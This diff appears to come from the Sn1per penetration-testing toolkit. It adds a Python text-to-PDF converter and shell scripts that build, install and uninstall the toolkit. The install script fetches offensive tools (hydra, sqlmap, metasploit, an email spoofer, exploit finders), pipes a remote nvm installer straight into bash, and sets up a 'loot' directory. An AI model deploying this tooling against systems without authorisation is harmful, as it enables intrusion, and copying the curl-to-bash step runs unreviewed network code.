+/onequarter /onehalf /threequarters /questiondown /Agrave
+/Aacute /Acircumflex /Atilde /Adieresis /Aring /AE
+/Ccedilla /Egrave /Eacute /Ecircumflex /Edieresis /Igrave
+/Iacute /Icircumflex /Idieresis /Eth /Ntilde /Ograve
+/Oacute /Ocircumflex /Otilde /Odieresis /multiply /Oslash
+/Ugrave /Uacute /Ucircumflex /Udieresis /Yacute /Thorn
+/germandbls /agrave /aacute /acircumflex /atilde /adieresis
+/aring /ae /ccedilla /egrave /eacute /ecircumflex
+/edieresis /igrave /iacute /icircumflex /idieresis /eth
+/ntilde /ograve /oacute /ocircumflex /otilde /odieresis
+/divide /oslash /ugrave /uacute /ucircumflex /udieresis
+/yacute /thorn /ydieresis ]
+>>
+"""
+
+INTRO="""\
+%prog [options] filename
+
+PyText2Pdf  makes a 7-bit clean PDF file from any input file.
+
+It reads from a named file, and writes the PDF file to a file specified by
+the user, otherwise to a file with '.pdf' appended to the input file.
+
+Author: Anand B Pillai."""
+
+
+class PyText2Pdf(object):
+    """ Text2pdf converter in pure Python """
+    
+    def __init__(self):
+        # version number
+        self._version="1.3"
+        # iso encoding flag
+        self._IsoEnc=False
+        # formfeeds flag
+        self._doFFs=False
+        self._progname="PyText2Pdf"
+        self._appname = " ".join((self._progname,str(self._version)))
+        # default font
+        self._font="/Courier"
+        # default font size
+        self._ptSize=10
+        # default vert space
+        self._vertSpace=12
+        self._lines=0
+        # number of characters in a row
+        self._cols=80
+        self._columns=1
+        # page ht
+        self._pageHt=792
+        # page wd
+        self._pageWd=612
+        # input file 
+        self._ifile=""
+        # output file 
+        self._ofile=""
+        # default tab width
+        self._tab=4
+        # input file descriptor
+        self._ifs=None
+        # output file descriptor
+        self._ofs=None
+        # landscape flag
+        self._landscape=False
+        # Subject
+        self._subject = ''
+        # Author
+        self._author = ''
+        # Keywords
+        self._keywords = []
+        # Custom regexp  for page breaks
+        self._pagebreakre = None
+        
+        # marker objects
+        self._curobj = 5
+        self._pageObs = [0]
+        self._locations = [0,0,0,0,0,0]
+        self._pageNo=0
+
+        # file position marker
+        self._fpos=0
+
+    def parse_args(self):
+        
+        """ Callback function called by argument parser.
+        Helps to remove duplicate code """
+
+        if len(sys.argv)<2:
+            sys.argv.append('-h')
+            
+        parser = optparse.OptionParser(usage=INTRO)
+        parser.add_option('-o','--output',dest='outfile',help='Direct output to file OUTFILE',metavar='OUTFILE')
+        parser.add_option('-f','--font',dest='font',help='Use Postscript font FONT (must be in standard 14, default: Courier)',
+                          default='Courier')
+        parser.add_option('-I','--isolatin',dest='isolatin',help='Use ISO latin-1 encoding',default=False,action='store_true')
+        parser.add_option('-s','--size',dest='fontsize',help='Use font at PTSIZE points (default=>10)',metavar='PTSIZE',default=10)
+        parser.add_option('-v','--linespace',dest='linespace',help='Use line spacing LINESPACE (deault 12)',metavar='LINESPACE',default=12)
+        parser.add_option('-l','--lines',dest='lines',help='Lines per page (default 60, determined automatically if unspecified)',default=60, metavar=None)
+        parser.add_option('-c','--chars',dest='chars',help='Maximum characters per line (default 80)',default=80,metavar=None)
+        parser.add_option('-t','--tab',dest='tabspace',help='Spaces per tab character (default 4)',default=4,metavar=None)
+        parser.add_option('-F','--ignoreff',dest='formfeed',help='Ignore formfeed character ^L (i.e, accept formfeed characters as pagebreaks)',default=False,action='store_true')
+        parser.add_option('-P','--papersize',dest='papersize',help='Set paper size (default is letter, accepted values are "A4" or "A3")')
+        parser.add_option('-W','--width',dest='width',help='Independent paper width in points',metavar=None,default=612)
+        parser.add_option('-H','--height',dest='height',help='Independent paper height in points',metavar=None,default=792)
+        parser.add_option('-2','--twocolumns',dest='twocolumns',help='Format as two columns',metavar=None,default=False,action='store_true')
+        parser.add_option('-L','--landscape',dest='landscape',help='Format in landscape mode',metavar=None,default=False,action='store_true')
+        parser.add_option('-R','--regexp',dest='pageregexp',help='Regular expression string to determine page breaks (if supplied, this will be used to split text into pages, instead of using line count)',metavar=None)
+        parser.add_option('-S','--subject',dest='subject',help='Optional subject for the document',metavar=None)
+        parser.add_option('-A','--author',dest='author',help='Optional author for the document',metavar=None)
+        parser.add_option('-K','--keywords',dest='keywords',help='Optional list of keywords for the document (separated by commas)',metavar=None)
+        
+
+        optlist, args = parser.parse_args()
+        # print optlist.__dict__, args
+
+        if len(args)==0:
+            sys.exit('Error: input file argument missing')
+        elif len(args)>1:
+            sys.exit('Error: Too many arguments')            
+
+        self._ifile = args[0]
+        
+        d = optlist.__dict__
+        if d.get('isolatin'): self._IsoEnc=True
+        if d.get('formfeed'): self._doFFs = True
+        if d.get('twocolumns'): self._columns = 2
+        if d.get('landscape'): self._landscape = True
+
+        self._font = '/' + d.get('font')
+        psize = d.get('papersize')
+        if psize=='A4':
+            self._pageWd=595
+            self._pageHt=842
+        elif psize=='A3':
+            self._pageWd=842
+            self._pageHt=1190
+
+        fsize = int(d.get('fontsize'))
+        if fsize < 1: fsize = 1
+        self._ptSize = fsize
+
+        lspace = int(d.get('linespace'))
+        if lspace<1: lspace = 1
+        self._vertSpace = lspace
+
+        lines = int(d.get('lines'))
+        if lines<1: lines = 1
+        self._lines = int(lines)
+
+        chars = int(d.get('chars'))
+        if chars<4: chars = 4
+        self._cols = chars
+
+        tab = int(d.get('tabspace'))
+        if tab<1: tab = 1
+        self._tab = tab
+
+        w = int(d.get('width'))
+        if w<72: w=72
+        self._pageWd = w
+
+        h = int(d.get('height'))
+        if h<72: h=72
+        self._pageHt = h
+
+        # Very optional args
+        author = d.get('author')
+        if author: self._author = author
+
+        subject = d.get('subject')
+        if subject: self._subject = subject
+
+        keywords = d.get('keywords')
+        if keywords:
+            self._keywords = keywords.split(',')
+
+        pagebreak = d.get('pageregexp')
+        if pagebreak:
+            self._pagebreakre = re.compile(pagebreak, re.UNICODE|re.IGNORECASE)
+        
+        outfile = d.get('outfile')
+        if outfile: self._ofile = outfile
+        
+        if self._landscape:
+            print 'Landscape option on...'
+        if self._columns==2:
+            print 'Printing in two columns...'
+        if self._doFFs:
+            print 'Ignoring form feed character...'
+        if self._IsoEnc:
+            print 'Using ISO Latin Encoding...'
+
+        print 'Using font',self._font[1:],'size =', self._ptSize
+
+    def writestr(self, str):
+        """ Write string to output file descriptor.
+        All output operations go through this function.
+        We keep the current file position also here"""
+
+        # update current file position
+        self._fpos += len(str)
+        for x in range(0, len(str)):
+            if str[x] == '\n':
+                self._fpos += LF_EXTRA
+        try:
+            self._ofs.write(str)
+        except IOError, e:
+            print e
+            return -1
+
+        return 0
+            
+    def convert(self):
+        """ Perform the actual conversion """
+    
+        if self._landscape:
+            # swap page width & height
+            tmp = self._pageHt
+            self._pageHt = self._pageWd
+            self._pageWd = tmp
+
+        if self._lines==0:
+            self._lines = (self._pageHt - 72)/self._vertSpace
+        if self._lines < 1:
+            self._lines=1
+        
+        try:
+            self._ifs=open(self._ifile)
+        except IOError, (strerror, errno):
+            print 'Error: Could not open file to read --->', self._ifile
+            sys.exit(3)
+
+        if self._ofile=="":
+            self._ofile = os.path.splitext(self._ifile)[0] + '.pdf'
+
+        try:
+            self._ofs = open(self._ofile, 'wb')
+        except IOError, (strerror, errno):
+            print 'Error: Could not open file to write --->', self._ofile
+            sys.exit(3)
+
+        print 'Input file=>',self._ifile
+        print 'Writing pdf file',self._ofile, '...'
+        self.writeheader()
+        self.writepages()
+        self.writerest()
+
+        print 'Wrote file', self._ofile
+        self._ifs.close()
+        self._ofs.close()
+        return 0
+
+    def writeheader(self):
+        """Write the PDF header"""
+
+        ws = self.writestr
+
+        title = self._ifile
+        
+        t=time.localtime()
+        timestr=str(time.strftime("D:%Y%m%d%H%M%S", t))
+        ws("%PDF-1.4\n")
+        self._locations[1] = self._fpos
+        ws("1 0 obj\n")
+        ws("<<\n")
+
+        buf = "".join(("/Creator (", self._appname, " By Anand B Pillai )\n"))
+        ws(buf)
+        buf = "".join(("/CreationDate (", timestr, ")\n"))
+        ws(buf)
+        buf = "".join(("/Producer (", self._appname, "(\\251 Anand B Pillai))\n"))
+        ws(buf)
+        if self._subject:
+            title = self._subject
+            buf = "".join(("/Subject (",self._subject,")\n"))
+            ws(buf)
+        if self._author:
+            buf = "".join(("/Author (",self._author,")\n"))
+            ws(buf)
+        if self._keywords:
+            buf = "".join(("/Keywords (",' '.join(self._keywords),")\n"))
+            ws(buf)
+
+        if title:
+            buf = "".join(("/Title (", title, ")\n"))
+            ws(buf)
+
+        ws(">>\n")
+        ws("endobj\n")
+    
+        self._locations[2] = self._fpos
+
+        ws("2 0 obj\n")
+        ws("<<\n")
+        ws("/Type /Catalog\n")
+        ws("/Pages 3 0 R\n")
+        ws(">>\n")
+        ws("endobj\n")
+        
+        self._locations[4] = self._fpos
+        ws("4 0 obj\n")
+        ws("<<\n")
+        buf = "".join(("/BaseFont ", str(self._font), " /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font >>\n"))
+        ws(buf)
+    
+        if self._IsoEnc:
+            ws(ENCODING_STR)
+            
+        ws(">>\n")
+        ws("endobj\n")
+        
+        self._locations[5] = self._fpos
+        
+        ws("5 0 obj\n")
+        ws("<<\n")
+        ws("  /Font << /F1 4 0 R >>\n")
+        ws("  /ProcSet [ /PDF /Text ]\n")
+        ws(">>\n")
+        ws("endobj\n")
+    
+    def startpage(self):
+        """ Start a page of data """
+
+        ws = self.writestr
+        
+        self._pageNo += 1
+        self._curobj += 1
+
+        self._locations.append(self._fpos)
+        self._locations[self._curobj]=self._fpos
+    
+        self._pageObs.append(self._curobj)
+        self._pageObs[self._pageNo] = self._curobj
+        
+        buf = "".join((str(self._curobj), " 0 obj\n"))
+
+        ws(buf)
+        ws("<<\n")
+        ws("/Type /Page\n")
+        ws("/Parent 3 0 R\n")
+        ws("/Resources 5 0 R\n")
+
+        self._curobj += 1
+        buf = "".join(("/Contents ", str(self._curobj), " 0 R\n"))
+        ws(buf)
+        ws(">>\n")
+        ws("endobj\n")
+        
+        self._locations.append(self._fpos)
+        self._locations[self._curobj] = self._fpos
+
+        buf = "".join((str(self._curobj), " 0 obj\n"))
+        ws(buf)
+        ws("<<\n")
+        
+        buf = "".join(("/Length ", str(self._curobj + 1), " 0 R\n"))
+        ws(buf)
+        ws(">>\n")
+        ws("stream\n")
+        strmPos = self._fpos
+    
+        ws("BT\n");
+        buf = "".join(("/F1 ", str(self._ptSize), " Tf\n"))
+        ws(buf)
+        buf = "".join(("1 0 0 1 50 ", str(self._pageHt - 40), " Tm\n"))
+        ws(buf)
+        buf = "".join((str(self._vertSpace), " TL\n"))
+        ws(buf)
+    
+        return strmPos
+
+    def endpage(self, streamStart):
+        """End a page of data """
+        
+        ws = self.writestr
+
+        ws("ET\n")
+        streamEnd = self._fpos
+        ws("endstream\n")
+        ws("endobj\n")
+    
+        self._curobj += 1
+        self._locations.append(self._fpos)
+        self._locations[self._curobj] = self._fpos
+    
+        buf = "".join((str(self._curobj), " 0 obj\n"))
+        ws(buf)
+        buf = "".join((str(streamEnd - streamStart), '\n'))
+        ws(buf)
+        ws('endobj\n')
+    
+    def writepages(self):
+        """Write pages as PDF"""
+        
+        ws = self.writestr
+
+        beginstream=0
+        lineNo, charNo=0,0
+        ch, column=0,0
+        padding,i=0,0
+        atEOF=0
+        linebuf = ''
+        
+        while not atEOF:
+            beginstream = self.startpage()
+            column=1
+            
+            while column <= self._columns:
+                column += 1
+                atFF=0
+                atBOP=0
+                lineNo=0
+                # Special flag for regexp page break
+                pagebreak = False
+                
+                while lineNo < self._lines and not atFF and not atEOF and not pagebreak:
+                    linebuf = ''
+                    lineNo += 1
+                    ws("(")
+                    charNo=0
+                    
+                    while charNo < self._cols:
+                        charNo += 1
+                        ch = self._ifs.read(1)
+                        cond = ((ch != '\n') and not(ch==FF and self._doFFs) and (ch != ''))
+                        if not cond:
+                            # See if this dude matches the pagebreak regexp
+                            if self._pagebreakre and self._pagebreakre.search(linebuf.strip()):
+                                pagebreak = True
+                                
+                            linebuf = ''
+                            break
+                        else:
+                            linebuf = linebuf + ch
+
+                        if ord(ch) >= 32 and ord(ch) <= 127:
+                            if ch == '(' or ch == ')' or ch == '\\':
+                                ws("\\")
+                            ws(ch)
+                        else:
+                            if ord(ch) == 9:
+                                padding =self._tab - ((charNo - 1) % self._tab)
+                                for i in range(padding):
+                                    ws(" ")
+                                charNo += (padding -1)
+                            else:
+                                if ch != FF:
+                                    # write \xxx form for dodgy character
+                                    buf = "".join(('\\', ch))
+                                    ws(buf)
+                                else:
+                                    # dont print anything for a FF
+                                    charNo -= 1
+
+                    ws(")'\n")
+                    if ch == FF:
+                        atFF=1
+                    if lineNo == self._lines:
+                        atBOP=1
+                        
+                    if atBOP:
+                        pos=0
+                        ch = self._ifs.read(1)
+                        pos= self._ifs.tell()
+                        if ch == FF:
+                            ch = self._ifs.read(1)
+                            pos=self._ifs.tell()
+                        # python's EOF signature
+                        if ch == '':
+                            atEOF=1
+                        else:
+                            # push position back by one char
+                            self._ifs.seek(pos-1)
+
+                    elif atFF:
+                        ch = self._ifs.read(1)
+                        pos=self._ifs.tell()
+                        if ch == '':
+                            atEOF=1
+                        else:
+                            self._ifs.seek(pos-1)
+
+                if column < self._columns:
+                    buf = "".join(("1 0 0 1 ",
+                                   str((self._pageWd/2 + 25)),
+                                   " ",
+                                   str(self._pageHt - 40),
+                                   " Tm\n"))
+                    ws(buf)
+
+            self.endpage(beginstream)
+
+    def writerest(self):
+        """Finish the file"""
+
+        ws = self.writestr
+        self._locations[3] = self._fpos
+    
+        ws("3 0 obj\n")
+        ws("<<\n")
+        ws("/Type /Pages\n")
+        buf = "".join(("/Count ", str(self._pageNo), "\n"))
+        ws(buf)
+        buf = "".join(("/MediaBox [ 0 0 ", str(self._pageWd), " ", str(self._pageHt), " ]\n"))
+        ws(buf)
+        ws("/Kids [ ")
+    
+        for i in range(1, self._pageNo+1):
+            buf = "".join((str(self._pageObs[i]), " 0 R "))
+            ws(buf)
+
+        ws("]\n")
+        ws(">>\n")
+        ws("endobj\n")
+        
+        xref = self._fpos
+        ws("xref\n")
+        buf = "".join(("0 ", str((self._curobj) + 1), "\n"))
+        ws(buf)
+        buf = "".join(("0000000000 65535 f ", str(LINE_END)))
+        ws(buf)
+
+        for i in range(1, self._curobj + 1):
+            val = self._locations[i]
+            buf = "".join((string.zfill(str(val), 10), " 00000 n ", str(LINE_END)))
+            ws(buf)
+
+        ws("trailer\n")
+        ws("<<\n")
+        buf = "".join(("/Size ", str(self._curobj + 1), "\n"))
+        ws(buf)
+        ws("/Root 2 0 R\n")
+        ws("/Info 1 0 R\n")
+        ws(">>\n")
+        
+        ws("startxref\n")
+        buf = "".join((str(xref), "\n"))
+        ws(buf)
+        ws("%%EOF\n")
+        
+
+def main():
+    
+    pdfclass=PyText2Pdf()
+    pdfclass.parse_args()
+    pdfclass.convert()
+
+if __name__ == "__main__":
+    main()

build.sh

@@ -0,0 +1,5 @@
+#!/bin/bash
+# build script to push to github... 
+git add *
+git commit -m 'Sn1per by 1N3CrowdShield'
+git push origin master

install.sh

@@ -19,27 +19,39 @@ echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
 echo ""
 
 INSTALL_DIR=/usr/share/sniper
+LOOT_DIR=/usr/share/sniper/loot
 PLUGINS_DIR=/usr/share/sniper/plugins
 
 echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
 read answer 
 
 mkdir -p $INSTALL_DIR 2> /dev/null
-cp -Rf $PWD/* $INSTALL_DIR 
+mkdir -p $LOOT_DIR 2> /dev/null
+mkdir $LOOT_DIR/domains 2> /dev/null
+mkdir $LOOT_DIR/screenshots 2> /dev/null
+mkdir $LOOT_DIR/nmap 2> /dev/null
+mkdir $LOOT_DIR/reports 2> /dev/null
+mkdir $LOOT_DIR/output 2> /dev/null
+mkdir $LOOT_DIR/osint 2> /dev/null
+cp -Rf $PWD/* $INSTALL_DIR 2> /dev/null
 cd $INSTALL_DIR
 
 echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
-apt-get install ruby rubygems python dos2unix zenmap sslyze uniscan xprobe2 cutycapt unicornscan waffit host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
-pip install dnspython colorama tldextract urllib3 ipaddress arachni
+apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt unicornscan host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
+apt-get install waffit 2> /dev/null
+pip install dnspython colorama tldextract urllib3 ipaddress requests
+curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
 
 echo -e "$OKORANGE + -- --=[Installing gem dependencies...$RESET"
+gem install aquatone
 gem install rake
 gem install ruby-nmap net-http-persistent mechanize text-table
 
 echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
 rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
-mkdir /usr/share/sniper/plugins/
+mkdir $PLUGINS_DIR 2> /dev/null
 cd $PLUGINS_DIR
+mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
 
 echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
 git clone https://github.com/1N3/Findsploit.git 
@@ -53,12 +65,24 @@ git clone https://github.com/0xsauby/yasuo.git
 git clone https://github.com/johndekroon/serializekiller.git 
 git clone https://github.com/aboul3la/Sublist3r.git 
 git clone https://github.com/nccgroup/shocker.git 
-git clone https://github.com/drwetter/testssl.sh.git 
+git clone --depth 1 https://github.com/drwetter/testssl.sh.git 
 git clone https://github.com/lunarca/SimpleEmailSpoofer 
 git clone https://github.com/arthepsy/ssh-audit 
+git clone https://github.com/m0rtem/CloudFail.git
+git clone https://github.com/deibit/cansina
+git clone https://github.com/1N3/jexboss.git
+wget https://github.com/bbb31/slurp/releases/download/1.3/slurp.zip
+unzip slurp.zip
+rm -f slurp.zip
+wget https://github.com/michenriksen/aquatone/blob/master/subdomains.lst -O /usr/share/sniper/plugins/Sublist3r/subdomains.lst
+wget https://raw.githubusercontent.com/1N3/IntruderPayloads/master/FuzzLists/dirbuster-quick.txt -O /usr/share/sniper/plugins/cansina/dirbuster-quick.txt
+wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
+wget https://raw.githubusercontent.com/xorrbit/nmap/865142904566e416944ebd6870d496c730934965/scripts/http-vuln-INTEL-SA-00075.nse -O /usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse
+cp $INSTALL_DIR/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse 2> /dev/null
 echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
-cd $PLUGINS_DIR/BruteX/
-bash install.sh
+cd $PLUGINS_DIR/CloudFail/ && apt-get install python3-pip && pip3 install -r requirements.txt
+cd $PLUGINS_DIR/Findsploit/ && bash install.sh
+cd $PLUGINS_DIR/BruteX/ && bash install.sh
 cd $INSTALL_DIR 
 mkdir $LOOT_DIR 2> /dev/null
 mkdir $LOOT_DIR/screenshots/ -p 2> /dev/null
@@ -93,7 +117,7 @@ ln -s $PLUGINS_DIR/Findsploit/copysploit /usr/bin/copysploit
 ln -s $PLUGINS_DIR/Findsploit/compilesploit /usr/bin/compilesploit
 ln -s $PLUGINS_DIR/MassBleed/massbleed /usr/bin/massbleed
 ln -s $PLUGINS_DIR/testssl.sh/testssl.sh /usr/bin/testssl
+msfdb init 
+msfdb start
 echo -e "$OKORANGE + -- --=[Done!$RESET"
 echo -e "$OKORANGE + -- --=[To run, type 'sniper'! $RESET"
-
-

uninstall.sh

@@ -0,0 +1,30 @@
+#!/bin/bash
+# Uninstall script for sn1per
+#
+# VARS
+OKBLUE='\033[94m'
+OKRED='\033[91m'
+OKGREEN='\033[92m'
+OKORANGE='\033[93m'
+RESET='\e[0m'
+
+echo -e "$OKRED                ____               $RESET"
+echo -e "$OKRED    _________  /  _/___  ___  _____$RESET"
+echo -e "$OKRED   / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
+echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
+echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
+echo -e "$OKRED               /_/                 $RESET"
+echo -e "$RESET"
+echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
+echo ""
+
+INSTALL_DIR=/usr/share/sniper
+
+echo -e "$OKGREEN + -- --=[This script will uninstall sniper and remove ALL files under $INSTALL_DIR. Are you sure you want to continue?$RESET"
+read answer 
+
+rm -Rf /usr/share/sniper/
+rm -f /usr/bin/sniper
+
+echo -e "$OKORANGE + -- --=[Done!$RESET"
+echo -e "$OKORANGE + -- --=[To run, type 'sniper'! $RESET"